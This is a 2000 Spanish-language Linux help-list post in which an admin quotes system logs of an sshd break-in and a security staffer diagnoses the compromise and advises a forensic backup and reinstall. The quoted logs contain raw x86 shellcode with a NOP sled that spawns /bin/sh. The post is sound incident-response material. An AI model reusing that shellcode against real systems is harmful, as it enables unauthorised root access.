Mensajes en /var/log/messages

Gunnar Wolf gwolf en campus.iztacala.unam.mx
Lun Oct 30 15:52:28 CST 2000 

>  Revisando las bitacoras encontre esto:
> ------------------
> Oct 29 04:54:16 telnet sshd[3911]: Did not receive ident string from 200.53.243.31.
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90>1À1Û1É°FÍ<80>1À1ÛC<89>ÙA°?Í<80>ëk^1À1É<8D>^^A<88>F^Df¹ÿ^A°'Í<80>1À<8D>^^A°=Í<80>1À1Û<8D>^^H<89>C^B1ÉþÉ1À<8D>
> ^^H°^LÍ<80>þÉuó1À<88>F^I<8D>^^H°=Í<80>þ^N°0þÈ<88>F^D1À<88>F^G<89>v^H<89>F^L<89>ó<8D>N^H<8D>V^L°^KÍ<80>1À1Û°^AÍ<80>è<90>ÿ
> ÿÿ0bin0sh1..11
> Oct 29 05:01:15 telnet sshd[3957]: Did not receive ident string from 200.53.243.31.
> Oct 29 05:04:02 telnet PAM_pwdb[3970]: password for (adm/3) changed by ((null)/0)
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
> <90><90><90>1À1Û1É°FÍ<80>1À1ÛC<89>ÙA°?Í<80>ëk^1À1É<8D>^^A<88>F^Df¹ÿ^A°'Í<80>1À<8D>^^A°=Í<80>1À1Û<8D>^^H<89>C^B1ÉþÉ1À<8D>
> ^^H°^LÍ<80>þÉuó1À<88>F^I<8D>^^H°=Í<80>þ^N°0þÈ<88>F^D1À<88>F^G<89>v^H<89>F^L<89>ó<8D>N^H<8D>V^L°^KÍ<80>1À1Û°^AÍ<80>è<90>ÿ
> ÿÿ0bin0sh1..11
> Oct 29 05:11:59 telnet PAM_pwdb[3981]: password for (adm/3) changed by ((null)/0)
> Oct 29 05:12:42 telnet kernel: amd uses obsolete (PF_INET,SOCK_PACKET)
> Oct 29 05:12:42 telnet kernel: device eth0 entered promiscuous mode
> ---------------
> 
>  Imaginome un ataque, ¿tipo?
> 
>  Por de mientras ya regrese a modo no promiscuo la tarjeta, mate todo lo
> que se puede matar y busque indicios pero no encuentro nada. La máquina
> estaba nueva así que no pasa de ahí, la reinstalo y se acabo pero quiero
> prevenir. En inet sólo estava FTP. Además estaba prendido ssh, smpt, https
> y nada más.
> 
>  Despues de resetear la máquina el lsof me muestra:
> 
> 	httpd    478 root    4u  IPv4    692       UDP *:1025
> 
>  Dados los síntomas, ¿por donde estan llegando?

Se ve raro... Pareceria que tu hostname es telnet. El ataque te lo
hicieron por ssh, probablemente tengas una version no actualizada. Lo que
te cayo es un tipico buffer overflow, y tu maquina fue efectivamente
comprometida: password for (adm/3) changed by ((null)/0). La persona que
lo hizo no es demasiado cuidadosa/conocedora pues dejo toda la evidencia,
y lanzo dos veces el exploit, teniendo exito en ambas ocasiones. 

Intento hacer algo con el automount daemon (amd), y despues de eso puso tu
tarjeta en modo promiscuo, supongo que para escuchar contrase&as de tu red
local. 

No me suena a nada el puerto 1025 de UDP, pero es buena esa tecnica, lo
esta escondiendo con un nombre de demonio legitimo. 

Amigo mio, tu computadora ya no es tuya, esta en manos de un atacante un
tanto inexperto. Mi recomendacion? Si puedes, haz un respaldo para poder
hacer un analisis forense, y reinstala el sistema.

Saludos,

-------------------------------------------------------------------
           Gunnar Wolf    gwolf en campus.iztacala.unam.mx
     Universidad Nacional Autónoma de México, Campus Iztacala
   Jefatura de Sección de Desarrollo y Admon. de Sistemas en Red
       Departamento de Seguridad en Computo - DGSCA - UNAM
-------------------------------------------------------------------
Celebremos Juntos el D'ia Internacional de la Seguridad en C'omputo
             30 de Noviembre --- Superando Retos.
                    www.disc2000.unam.mx
-------------------------------------------------------------------

---------------------------------------------------------
para salir de la lista, enviar un mensaje con las palabras
"unsubscribe ayuda" en el cuerpo a majordomo en linux.org.mx

Más información sobre la lista de distribución Ayuda